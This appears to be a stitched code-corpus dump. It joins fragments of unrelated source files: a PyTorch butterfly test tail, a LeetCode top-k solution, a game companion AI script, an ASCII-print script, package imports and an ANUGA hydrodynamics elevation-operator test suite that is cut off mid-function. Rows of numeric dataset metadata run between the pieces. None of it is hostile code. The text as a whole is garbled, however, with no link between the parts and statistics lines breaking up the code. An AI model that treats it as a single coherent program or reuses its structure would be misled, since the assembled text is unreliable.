self.assertTrue(torch.allclose(d_input, d_input_old, rtol=self.rtol, atol=self.atol),
((d_input - d_input_old).abs().max().item(), device))
self.assertTrue(torch.allclose(d_diagonal, d_diagonal_old, rtol=self.rtol * (10 if batch_size > 1024 else 1),
atol=self.atol * (10 if batch_size > 1024 else 1)),
((d_diagonal - d_diagonal_old).abs().max().item(), device))
self.assertTrue(torch.allclose(d_twiddle, d_twiddle_old, rtol=self.rtol * (10 if batch_size > 1024 else 1),
atol=self.atol * (10 if batch_size > 1024 else 1)),
(((d_twiddle - d_twiddle_old) / d_twiddle_old).abs().max().item(),
(batch_size, n), device))
if __name__ == "__main__":
unittest.main()
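The ortho butterfly factors exercised above are parameterized by angles through `twiddle.cos()` / `twiddle.sin()`. As a minimal plain-NumPy sketch (independent of the CUDA kernels under test), each such factor acts like a 2x2 rotation, which is orthogonal and therefore norm-preserving:

```python
import numpy as np

theta = 0.3                     # one twiddle angle
c, s = np.cos(theta), np.sin(theta)
R = np.array([[c, -s],
              [s,  c]])         # a single 2x2 orthogonal butterfly factor

x = np.array([1.0, 2.0])
y = R @ x

# orthogonal factor => R^T R = I and the input norm is preserved
assert np.allclose(R.T @ R, np.eye(2))
assert np.isclose(np.linalg.norm(y), np.linalg.norm(x))
```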
| 74.307818 | 176 | 0.571507 | 5,431 | 45,625 | 4.545572 | 0.035537 | 0.064487 | 0.047393 | 0.059059 | 0.938956 | 0.918905 | 0.908575 | 0.886499 | 0.854944 | 0.830316 | 0 | 0.022214 | 0.320175 | 45,625 | 613 | 177 | 74.429038 | 0.773705 | 0.114784 | 0 | 0.717391 | 0 | 0 | 0.00335 | 0 | 0 | 0 | 0 | 0.001631 | 0.106719 | 1 | 0.039526 | false | 0 | 0.051383 | 0 | 0.092885 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6d3fe2b7b7c589872a009d32d8048bee52672000 | 646 | py | Python | top-k-frequent-elements.py | 11aparna91/LeetCodesPython | 317ddd963122e082ced8a6510bd04255d59b6c35 | [
"MIT"
] | 1 | 2021-10-06T00:07:30.000Z | 2021-10-06T00:07:30.000Z | top-k-frequent-elements.py | 11aparna91/LeetCodesPython | 317ddd963122e082ced8a6510bd04255d59b6c35 | [
"MIT"
] | null | null | null | top-k-frequent-elements.py | 11aparna91/LeetCodesPython | 317ddd963122e082ced8a6510bd04255d59b6c35 | [
"MIT"
] | null | null | null | ##################################### Problem Number 347 ###################################
from collections import Counter
from typing import List
import heapq


class Solution:
    def topKFrequent(self, nums: List[int], k: int) -> List[int]:
        count = Counter(nums)
        return heapq.nlargest(k, count, key=count.get)
####################################################################### Solution 2 ##################
from collections import Counter
from typing import List
import heapq


class Solution:
    def topKFrequent(self, nums: List[int], k: int) -> List[int]:
        count = Counter(nums)
        return heapq.nlargest(k, count.keys(), key=count.get)
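Both solutions rely on `heapq.nlargest` accepting a `key` function, so the heap orders the distinct values by their counts. A quick standalone check of the pattern:

```python
from collections import Counter
import heapq

nums = [1, 1, 1, 2, 2, 3]
count = Counter(nums)                      # Counter({1: 3, 2: 2, 3: 1})
top2 = heapq.nlargest(2, count, key=count.get)
print(top2)  # -> [1, 2]
```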
| 30.761905 | 101 | 0.459752 | 60 | 646 | 4.95 | 0.4 | 0.094276 | 0.141414 | 0.188552 | 0.828283 | 0.828283 | 0.828283 | 0.828283 | 0.828283 | 0.828283 | 0 | 0.007859 | 0.212074 | 646 | 20 | 102 | 32.3 | 0.575639 | 0.044892 | 0 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.2 | 0 | 0.8 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
6d52b3e969f57db4437166f72002726f98667759 | 210 | py | Python | molsysmt/elements/component/__init__.py | dprada/molsysmt | 83f150bfe3cfa7603566a0ed4aed79d9b0c97f5d | [
"MIT"
] | null | null | null | molsysmt/elements/component/__init__.py | dprada/molsysmt | 83f150bfe3cfa7603566a0ed4aed79d9b0c97f5d | [
"MIT"
] | null | null | null | molsysmt/elements/component/__init__.py | dprada/molsysmt | 83f150bfe3cfa7603566a0ed4aed79d9b0c97f5d | [
"MIT"
] | null | null | null | from .component import component_index_from_atom, component_id_from_component
from .component import component_name_from_component, component_type_from_component
from .component import n_components_from_system
| 52.5 | 83 | 0.909524 | 29 | 210 | 6.068966 | 0.37931 | 0.443182 | 0.323864 | 0.318182 | 0.363636 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.066667 | 210 | 3 | 84 | 70 | 0.897959 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
edd65fc35cd4444707d24be5f298f3b399c5d977 | 17,390 | py | Python | tpdatasrc/co8fixes/scr/py00041animal_companion.py | edoipi/TemplePlus | f0e552289822fea908f16daa379fa568b1bd286d | [
"MIT"
] | 69 | 2015-05-05T14:09:25.000Z | 2022-02-15T06:13:04.000Z | tpdatasrc/co8fixes/scr/py00041animal_companion.py | edoipi/TemplePlus | f0e552289822fea908f16daa379fa568b1bd286d | [
"MIT"
] | 457 | 2015-05-01T22:07:45.000Z | 2022-03-31T02:19:10.000Z | tpdatasrc/co8fixes/scr/py00041animal_companion.py | edoipi/TemplePlus | f0e552289822fea908f16daa379fa568b1bd286d | [
"MIT"
] | 25 | 2016-02-04T21:19:53.000Z | 2021-11-15T23:14:51.000Z | from toee import *
from utilities import *
from py00439script_daemon import *
from combat_standard_routines import *
def san_start_combat( attachee, triggerer ):
    if (attachee.leader_get() != OBJ_HANDLE_NULL and not npc_get(attachee,2)):
        leader = attachee.leader_get()
        if (group_pc_percent_hp( attachee, leader ) <= 40):
            attachee.obj_set_int(obj_f_critter_strategy, 462)
        else:
            party_size = game.party_npc_size() + game.party_pc_size()
            # flag party members at or below 50% hp who are not yet dead
            for pp in range(0, party_size):
                if (game.party[pp] != OBJ_HANDLE_NULL):
                    if (obj_percent_hp(game.party[pp]) <= 50 and game.party[pp].stat_level_get(stat_hp_current) >= -9):
                        game.global_flags[250 + pp] = 1
                        game.global_flags[258] = 1
            # flag whether the companion already stands beside a wounded member
            for pp in range(0, party_size):
                if (game.global_flags[250 + pp] == 1):
                    if (adjacent(attachee, game.party[pp])):
                        game.global_flags[259] = 1
            if (game.global_flags[258] == 1 and game.global_flags[259] == 0):
                # someone is badly hurt and the companion is not next to them
                attachee.obj_set_int(obj_f_critter_strategy, 463)
            else:
                attachee.obj_set_int(obj_f_critter_strategy, 464)
                if (triggerer.type == obj_t_npc and triggerer.leader_get() == OBJ_HANDLE_NULL):
                    attachee.turn_towards(triggerer)
                else:
                    for pc in game.party:
                        if ( pc.has_feat(feat_animal_companion) ):
                            attachee.turn_towards(pc)
                        else:
                            attachee.turn_towards(game.party[0])
    # reset the scratch flags used above
    for flag in range(250, 260):
        game.global_flags[flag] = 0
    return RUN_DEFAULT
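The flag juggling above reduces to one rule: flag 258 marks "some party member is at or below 50% hp", flag 259 marks "the companion is adjacent to such a member", and strategy 463 is chosen only when the first holds without the second; otherwise strategy 464 applies. A stand-alone sketch of that decision (the function name `pick_strategy` is invented for illustration and not part of the ToEE API):

```python
def pick_strategy(wounded, adjacent_to):
    # wounded[i]: party member i is at <= 50% hp
    # adjacent_to[i]: the companion stands beside member i
    someone_wounded = any(wounded)                                        # flag 258
    beside_wounded = any(w and a for w, a in zip(wounded, adjacent_to))   # flag 259
    if someone_wounded and not beside_wounded:
        return 463   # head toward the hurt party member
    return 464       # default strategy

assert pick_strategy([1, 0], [0, 0]) == 463
assert pick_strategy([1, 0], [1, 0]) == 464
assert pick_strategy([0, 0], [0, 0]) == 464
```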
def san_join( attachee, triggerer ):
    if (npc_get(attachee,1)):
        npc_set(attachee,2)
    return RUN_DEFAULT


def san_spell_cast( attachee, triggerer, spell ):
    if ( spell.spell == spell_charm_person_or_animal or spell.spell == spell_charm_monster ):
        npc_set(attachee,1)
    return RUN_DEFAULT


def not_adjacent( companion, target ):
    if (companion.distance_to(target) >= 5):
        return 1
    return 0


def adjacent( companion, target ):
    if (companion.distance_to(target) <= 5):
        return 1
return 0 | 39.885321 | 104 | 0.668143 | 2,709 | 17,390 | 4.032853 | 0.03433 | 0.142792 | 0.214188 | 0.061876 | 0.939863 | 0.931808 | 0.925767 | 0.925675 | 0.92238 | 0.919176 | 0 | 0.065042 | 0.185739 | 17,390 | 436 | 105 | 39.885321 | 0.706497 | 0 | 0 | 0.894118 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.011765 | false | 0 | 0.009412 | 0 | 0.037647 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
edfbaf352e8d4f3f04dd8453683d5053fa972138 | 267 | py | Python | caracteres.py | fmbdti/Arte_em_ASCII | 39293344e78e79d1016f557b08150f791e2ca1aa | [
"MIT"
] | null | null | null | caracteres.py | fmbdti/Arte_em_ASCII | 39293344e78e79d1016f557b08150f791e2ca1aa | [
"MIT"
] | null | null | null | caracteres.py | fmbdti/Arte_em_ASCII | 39293344e78e79d1016f557b08150f791e2ca1aa | [
"MIT"
] | null | null | null | print("O jeito difícil")
print ("##############################")
print ("##############################")
print ("##############################")
print("O jeito fácil")
print ("#" * 30)
print ("#" * 30)
print ("#" * 30)
print ("/\ " * 10)
print (" \/" * 10)
| 17.8 | 40 | 0.314607 | 21 | 267 | 4 | 0.333333 | 0.357143 | 0.428571 | 0.333333 | 0.309524 | 0 | 0 | 0 | 0 | 0 | 0 | 0.044248 | 0.153558 | 267 | 14 | 41 | 19.071429 | 0.327434 | 0 | 0 | 0.6 | 0 | 0 | 0.483146 | 0.337079 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
612aa8a9c636e6e96a3e0bbc62177878e209d523 | 202 | py | Python | simple_grpc_chat/frontend/src/__init__.py | vdshk/simple-grpc-chat | 09329a95108ea1cc72c901226112fdc65b3c3e76 | [
"MIT"
] | null | null | null | simple_grpc_chat/frontend/src/__init__.py | vdshk/simple-grpc-chat | 09329a95108ea1cc72c901226112fdc65b3c3e76 | [
"MIT"
] | null | null | null | simple_grpc_chat/frontend/src/__init__.py | vdshk/simple-grpc-chat | 09329a95108ea1cc72c901226112fdc65b3c3e76 | [
"MIT"
] | null | null | null | from simple_grpc_chat.frontend.src.client import *
from simple_grpc_chat.frontend.src.server import *
from simple_grpc_chat.frontend.src.login import *
from simple_grpc_chat.frontend.src.start import *
| 40.4 | 50 | 0.841584 | 32 | 202 | 5.0625 | 0.34375 | 0.246914 | 0.345679 | 0.444444 | 0.82716 | 0.82716 | 0.648148 | 0 | 0 | 0 | 0 | 0 | 0.079208 | 202 | 4 | 51 | 50.5 | 0.870968 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 8 |
612b73cbc646a252f4c3f6ab8f1eaac7586ce866 | 44,916 | py | Python | anuga/operators/tests/test_set_elevation_operator.py | samcom12/anuga_core | f4378114dbf02d666fe6423de45798add5c42806 | [
"Python-2.0",
"OLDAP-2.7"
] | 136 | 2015-05-07T05:47:43.000Z | 2022-02-16T03:07:40.000Z | anuga/operators/tests/test_set_elevation_operator.py | samcom12/anuga_core | f4378114dbf02d666fe6423de45798add5c42806 | [
"Python-2.0",
"OLDAP-2.7"
] | 184 | 2015-05-03T09:27:54.000Z | 2021-12-20T04:22:48.000Z | anuga/operators/tests/test_set_elevation_operator.py | samcom12/anuga_core | f4378114dbf02d666fe6423de45798add5c42806 | [
"Python-2.0",
"OLDAP-2.7"
] | 70 | 2015-03-18T07:35:22.000Z | 2021-11-01T07:07:29.000Z | """ Test set operators - stage elevation erosion.
"""
from __future__ import division
from past.utils import old_div
import unittest, os
import anuga
from anuga import Domain
from anuga import Reflective_boundary
from anuga import rectangular_cross_domain
from anuga import file_function
from anuga.config import netcdf_mode_r, netcdf_mode_w, netcdf_mode_a
from anuga.file_conversion.file_conversion import timefile2netcdf
from anuga.config import time_format
from anuga.operators.set_elevation_operator import *
from pprint import pprint
import numpy as num
import warnings
import time
class Test_set_elevation_operator(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
    def test_set_elevation_operator_simple_1_5(self):
        from anuga.config import rho_a, rho_w, eta_w
        from math import pi, cos, sin

        a = [0.0, 0.0]
        b = [0.0, 2.0]
        c = [2.0, 0.0]
        d = [0.0, 4.0]
        e = [2.0, 2.0]
        f = [4.0, 0.0]

        points = [a, b, c, d, e, f]
        # bac, bce, ecf, dbe
        vertices = [[1,0,2], [1,2,4], [4,2,5], [3,1,4]]

        domain = Domain(points, vertices)
        domain.set_flow_algorithm('1_5')

        # Flat surface with 1m of water
        domain.set_quantity('elevation', 0)
        domain.set_quantity('stage', 1.0)
        domain.set_quantity('friction', 0)

        stage_c = domain.quantities['stage'].centroid_values
        elev_c = domain.quantities['elevation'].centroid_values
        height_c = stage_c - elev_c
        integral0 = num.sum(height_c)

        Br = Reflective_boundary(domain)
        domain.set_boundary({'exterior': Br})

        # print domain.quantities['stage'].centroid_values
        # print domain.quantities['xmomentum'].centroid_values
        # print domain.quantities['ymomentum'].centroid_values

        # Apply operator to these triangles
        indices = [0,1,3]
        elev = 3.0
        operator = Set_elevation_operator(domain, elevation=elev, indices=indices)

        # Apply Operator
        domain.timestep = 2.0
        operator()

        height_c = stage_c - elev_c
        integral1 = num.sum(height_c)
        assert integral0 == integral1

        stage_ex = [ 3.66666667, 3.33333333, 2.33333333, 3.66666667]
        elev_ex = [ 2.66666667, 2.33333333, 1.33333333, 2.66666667]

        # print domain.quantities['elevation'].centroid_values
        # print domain.quantities['stage'].centroid_values
        # print domain.quantities['xmomentum'].centroid_values
        # print domain.quantities['ymomentum'].centroid_values

        assert num.allclose(domain.quantities['elevation'].centroid_values, elev_ex)
        assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
        assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
        assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
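The `integral0 == integral1` check above verifies that the operator conserves water volume: raising the bed while lifting the free surface leaves the total depth `stage - elevation` unchanged. A simplified picture of the invariant in isolation (plain NumPy, values are illustrative only):

```python
import numpy as np

stage = np.array([1.0, 1.0, 1.0, 1.0])   # free surface per centroid
elev = np.zeros(4)                       # flat bed
depth_before = np.sum(stage - elev)

# raise the bed by 3 m and lift the free surface by the same amount
elev_new = elev + 3.0
stage_new = stage + 3.0
depth_after = np.sum(stage_new - elev_new)

assert depth_before == depth_after       # total water volume conserved
```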
    def test_set_elevation_operator_simple_de0(self):
        from anuga.config import rho_a, rho_w, eta_w
        from math import pi, cos, sin

        a = [0.0, 0.0]
        b = [0.0, 2.0]
        c = [2.0, 0.0]
        d = [0.0, 4.0]
        e = [2.0, 2.0]
        f = [4.0, 0.0]

        points = [a, b, c, d, e, f]
        # bac, bce, ecf, dbe
        vertices = [[1,0,2], [1,2,4], [4,2,5], [3,1,4]]

        domain = Domain(points, vertices)

        # Flat surface with 1m of water
        domain.set_quantity('elevation', 0)
        domain.set_quantity('stage', 1.0)
        domain.set_quantity('friction', 0)

        stage_c = domain.quantities['stage'].centroid_values
        elev_c = domain.quantities['elevation'].centroid_values
        height_c = stage_c - elev_c
        integral0 = num.sum(height_c)

        Br = Reflective_boundary(domain)
        domain.set_boundary({'exterior': Br})

        # pprint( domain.quantities['stage'].centroid_values )
        # pprint( domain.quantities['xmomentum'].centroid_values )
        # pprint( domain.quantities['ymomentum'].centroid_values )

        # Apply operator to these triangles
        indices = [0,1,3]
        elev = 3.0
        operator = Set_elevation_operator(domain, elevation=elev, indices=indices)

        # Apply Operator
        domain.timestep = 2.0
        operator()

        height_c = stage_c - elev_c
        integral1 = num.sum(height_c)
        assert integral0 == integral1

        stage_ex = [ 4., 4., 1., 4.]
        elev_ex = [ 3., 3., 0., 3.]

        # pprint( domain.quantities['elevation'].centroid_values )
        # pprint( domain.quantities['stage'].centroid_values )
        # pprint( domain.quantities['xmomentum'].centroid_values )
        # pprint( domain.quantities['ymomentum'].centroid_values )

        assert num.allclose(domain.quantities['elevation'].centroid_values, elev_ex)
        assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
        assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
        assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
    def test_set_elevation_operator_negative_1_5(self):
        from anuga.config import rho_a, rho_w, eta_w
        from math import pi, cos, sin

        a = [0.0, 0.0]
        b = [0.0, 2.0]
        c = [2.0, 0.0]
        d = [0.0, 4.0]
        e = [2.0, 2.0]
        f = [4.0, 0.0]

        points = [a, b, c, d, e, f]
        # bac, bce, ecf, dbe
        vertices = [[1,0,2], [1,2,4], [4,2,5], [3,1,4]]

        domain = Domain(points, vertices)
        domain.set_flow_algorithm('1_5')

        # Flat surface with 1m of water
        domain.set_quantity('elevation', lambda x,y : -2*x)
        domain.set_quantity('stage', 1.0)
        domain.set_quantity('friction', 0)

        stage_c = domain.quantities['stage'].centroid_values
        elev_c = domain.quantities['elevation'].centroid_values
        height_c = stage_c - elev_c
        integral0 = num.sum(height_c)

        Br = Reflective_boundary(domain)
        domain.set_boundary({'exterior': Br})

        # print domain.quantities['elevation'].centroid_values
        # print domain.quantities['stage'].centroid_values
        # print domain.quantities['xmomentum'].centroid_values
        # print domain.quantities['ymomentum'].centroid_values

        # Apply operator to these triangles
        indices = [0,1,3]

        # Catchment_Rain_Polygon = read_polygon(join('CatchmentBdy.csv'))
        # rainfall = file_function(join('1y120m.tms'), quantities=['rainfall'])
        elev = -5.0
        operator = Set_elevation_operator(domain, elevation=elev, indices=indices)

        # Apply Operator
        domain.timestep = 2.0
        operator()

        height_c = stage_c - elev_c
        integral1 = num.sum(height_c)
        assert integral0 == integral1

        elev_ex = [-4.88888889, -4.77777778, -5.77777778, -4.88888889]
        stage_ex = [-2.55555556, -1.11111111, 0.55555556, -2.55555556]

        # print domain.quantities['elevation'].centroid_values
        # print domain.quantities['stage'].centroid_values
        # print domain.quantities['xmomentum'].centroid_values
        # print domain.quantities['ymomentum'].centroid_values

        assert num.allclose(domain.quantities['elevation'].centroid_values, elev_ex)
        assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
        assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
        assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
    def test_set_elevation_operator_negative_de0(self):
        from anuga.config import rho_a, rho_w, eta_w
        from math import pi, cos, sin

        a = [0.0, 0.0]
        b = [0.0, 2.0]
        c = [2.0, 0.0]
        d = [0.0, 4.0]
        e = [2.0, 2.0]
        f = [4.0, 0.0]

        points = [a, b, c, d, e, f]
        # bac, bce, ecf, dbe
        vertices = [[1,0,2], [1,2,4], [4,2,5], [3,1,4]]

        domain = Domain(points, vertices)

        # Flat surface with 1m of water
        domain.set_quantity('elevation', lambda x,y : -2*x)
        domain.set_quantity('stage', 1.0)
        domain.set_quantity('friction', 0)

        stage_c = domain.quantities['stage'].centroid_values
        elev_c = domain.quantities['elevation'].centroid_values
        height_c = stage_c - elev_c
        integral0 = num.sum(height_c)

        Br = Reflective_boundary(domain)
        domain.set_boundary({'exterior': Br})

        # print domain.quantities['elevation'].centroid_values
        # print domain.quantities['stage'].centroid_values
        # print domain.quantities['xmomentum'].centroid_values
        # print domain.quantities['ymomentum'].centroid_values

        # Apply operator to these triangles
        indices = [0,1,3]

        # Catchment_Rain_Polygon = read_polygon(join('CatchmentBdy.csv'))
        # rainfall = file_function(join('1y120m.tms'), quantities=['rainfall'])
        elev = -5.0
        operator = Set_elevation_operator(domain, elevation=elev, indices=indices)

        # Apply Operator
        domain.timestep = 2.0
        operator()

        height_c = stage_c - elev_c
        integral1 = num.sum(height_c)
        assert integral0 == integral1

        elev_ex = [-5. , -5. , -5.33333333, -5. ]
        stage_ex = [-2.66666667, -1.33333333, 1. , -2.66666667]

        # pprint( domain.quantities['elevation'].centroid_values )
        # pprint( domain.quantities['stage'].centroid_values )
        # pprint( domain.quantities['xmomentum'].centroid_values )
        # pprint( domain.quantities['ymomentum'].centroid_values )

        assert num.allclose(domain.quantities['elevation'].centroid_values, elev_ex)
        assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
        assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
        assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
    def test_set_elevation_operator_small_function_1_5(self):
        from anuga.config import rho_a, rho_w, eta_w
        from math import pi, cos, sin

        a = [0.0, 0.0]
        b = [0.0, 2.0]
        c = [2.0, 0.0]
        d = [0.0, 4.0]
        e = [2.0, 2.0]
        f = [4.0, 0.0]
        points = [a, b, c, d, e, f]
        # bac, bce, ecf, dbe
        vertices = [[1, 0, 2], [1, 2, 4], [4, 2, 5], [3, 1, 4]]

        domain = Domain(points, vertices)
        domain.set_flow_algorithm('1_5')

        # Flat surface with 1m of water
        domain.set_quantity('elevation', 0.0)
        domain.set_quantity('stage', 1.0)
        domain.set_quantity('friction', 0)

        Br = Reflective_boundary(domain)
        domain.set_boundary({'exterior': Br})

        # Apply operator to these triangles
        indices = [0, 1, 3]

        def elev(t):
            if t < 10.0:
                return 5.0
            else:
                return 7.0

        operator = Set_elevation_operator(domain, elevation=elev, indices=indices)

        # Apply operator at time t=1.0
        domain.set_time(1.0)
        operator()

        elev_ex = [4.44444444, 3.88888889, 2.22222222, 4.44444444]
        stage_ex = [5.44444444, 4.88888889, 3.22222222, 5.44444444]

        assert num.allclose(domain.quantities['elevation'].centroid_values, elev_ex)
        assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
        assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
        assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)

        # Apply operator at time t=15.0
        domain.set_time(15.0)
        operator()

        elev_ex = [6.59259259, 6.18518519, 3.85185185, 6.59259259]
        stage_ex = [7.59259259, 7.18518519, 4.85185185, 7.59259259]

        assert num.allclose(domain.quantities['elevation'].centroid_values, elev_ex)
        assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
        assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
        assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
    def test_set_elevation_operator_small_function_de0(self):
        from anuga.config import rho_a, rho_w, eta_w
        from math import pi, cos, sin

        a = [0.0, 0.0]
        b = [0.0, 2.0]
        c = [2.0, 0.0]
        d = [0.0, 4.0]
        e = [2.0, 2.0]
        f = [4.0, 0.0]
        points = [a, b, c, d, e, f]
        # bac, bce, ecf, dbe
        vertices = [[1, 0, 2], [1, 2, 4], [4, 2, 5], [3, 1, 4]]

        domain = Domain(points, vertices)

        # Flat surface with 1m of water
        domain.set_quantity('elevation', 0.0)
        domain.set_quantity('stage', 1.0)
        domain.set_quantity('friction', 0)

        Br = Reflective_boundary(domain)
        domain.set_boundary({'exterior': Br})

        # Apply operator to these triangles
        indices = [0, 1, 3]

        def elev(t):
            if t < 10.0:
                return 5.0
            else:
                return 7.0

        operator = Set_elevation_operator(domain, elevation=elev, indices=indices)

        # Apply operator at time t=1.0
        domain.set_time(1.0)
        operator()

        elev_ex = [5., 5., 0., 5.]
        stage_ex = [6., 6., 1., 6.]

        assert num.allclose(domain.quantities['elevation'].centroid_values, elev_ex)
        assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
        assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
        assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)

        # Apply operator at time t=15.0
        domain.set_time(15.0)
        operator()

        elev_ex = [7., 7., 0., 7.]
        stage_ex = [8., 8., 1., 8.]

        assert num.allclose(domain.quantities['elevation'].centroid_values, elev_ex)
        assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
        assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
        assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
    def test_set_polygonal_elevation_operator_large_function(self):
        from anuga.config import rho_a, rho_w, eta_w
        from math import pi, cos, sin

        length = 2.0
        width = 2.0
        dx = dy = 0.5
        domain = rectangular_cross_domain(int(old_div(length, dx)), int(old_div(width, dy)),
                                          len1=length, len2=width)

        # Flat surface with 1m of water
        domain.set_quantity('elevation', 0.0)
        domain.set_quantity('stage', 1.0)
        domain.set_quantity('friction', 0)

        R = Reflective_boundary(domain)
        domain.set_boundary({'left': R, 'right': R, 'bottom': R, 'top': R})

        def elev(t):
            if t < 10.0:
                return 5.0
            else:
                return 7.0

        polygon = [(0.5, 0.5), (1.5, 0.5), (1.5, 1.5), (0.5, 1.5)]
        operator = Polygonal_set_elevation_operator(domain, elevation=elev, polygon=polygon)

        # Apply operator at time t=1.0
        domain.set_time(1.0)
        operator()

        elev_ex = [0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
                   0., 0., 0., 0., 0., 0., 0., 5., 5., 5., 5., 5., 5.,
                   5., 5., 0., 0., 0., 0., 0., 0., 0., 0., 5., 5., 5.,
                   5., 5., 5., 5., 5., 0., 0., 0., 0., 0., 0., 0., 0.,
                   0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.]
        stage_ex = [1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
                    1., 1., 1., 1., 1., 1., 1., 6., 6., 6., 6., 6., 6.,
                    6., 6., 1., 1., 1., 1., 1., 1., 1., 1., 6., 6., 6.,
                    6., 6., 6., 6., 6., 1., 1., 1., 1., 1., 1., 1., 1.,
                    1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.]

        assert num.allclose(domain.quantities['elevation'].centroid_values, elev_ex)
        assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
        assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
        assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)

        # Apply operator at time t=15.0
        domain.set_time(15.0)
        operator()

        elev_ex = [0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
                   0., 0., 0., 0., 0., 0., 0., 7., 7., 7., 7., 7., 7.,
                   7., 7., 0., 0., 0., 0., 0., 0., 0., 0., 7., 7., 7.,
                   7., 7., 7., 7., 7., 0., 0., 0., 0., 0., 0., 0., 0.,
                   0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.]
        stage_ex = [1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
                    1., 1., 1., 1., 1., 1., 1., 8., 8., 8., 8., 8., 8.,
                    8., 8., 1., 1., 1., 1., 1., 1., 1., 1., 8., 8., 8.,
                    8., 8., 8., 8., 8., 1., 1., 1., 1., 1., 1., 1., 1.,
                    1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.]

        assert num.allclose(domain.quantities['elevation'].centroid_values, elev_ex)
        assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
        assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
        assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
    def test_set_elevation_operator_large_function(self):
        from anuga.config import rho_a, rho_w, eta_w
        from math import pi, cos, sin

        length = 2.0
        width = 2.0
        dx = dy = 0.5
        domain = rectangular_cross_domain(int(old_div(length, dx)), int(old_div(width, dy)),
                                          len1=length, len2=width)

        # Flat surface with 1m of water
        domain.set_quantity('elevation', 0.0)
        domain.set_quantity('stage', 1.0)
        domain.set_quantity('friction', 0)

        R = Reflective_boundary(domain)
        domain.set_boundary({'left': R, 'right': R, 'bottom': R, 'top': R})

        def elev(t):
            if t < 10.0:
                return 5.0
            else:
                return 7.0

        polygon = [(0.5, 0.5), (1.5, 0.5), (1.5, 1.5), (0.5, 1.5)]
